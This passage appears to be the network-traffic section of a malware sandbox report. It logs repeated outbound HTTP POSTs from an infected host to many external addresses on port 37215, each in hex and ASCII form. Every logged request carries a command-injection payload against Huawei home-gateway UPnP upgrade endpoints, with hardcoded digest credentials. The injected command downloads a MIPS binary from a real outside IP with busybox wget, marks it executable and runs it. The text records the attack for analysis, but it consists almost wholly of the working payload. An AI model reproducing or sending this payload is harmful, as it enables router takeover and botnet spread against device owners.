                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            276192.168.2.1358106197.144.113.12937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.213967085 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            277192.168.2.1350926197.29.244.23437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.214767933 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            278192.168.2.1357534156.166.206.20037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.215590000 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            279192.168.2.133448241.10.140.6137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.216411114 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            280192.168.2.1341384156.203.151.22837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.217259884 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            281192.168.2.1345262156.193.239.25337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.218072891 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            282192.168.2.1347364156.60.167.23437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.218889952 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            283192.168.2.134659441.228.140.9737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.219729900 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            284192.168.2.1334654156.16.252.11337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.220634937 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            285192.168.2.1354140197.225.243.20937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.221508026 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
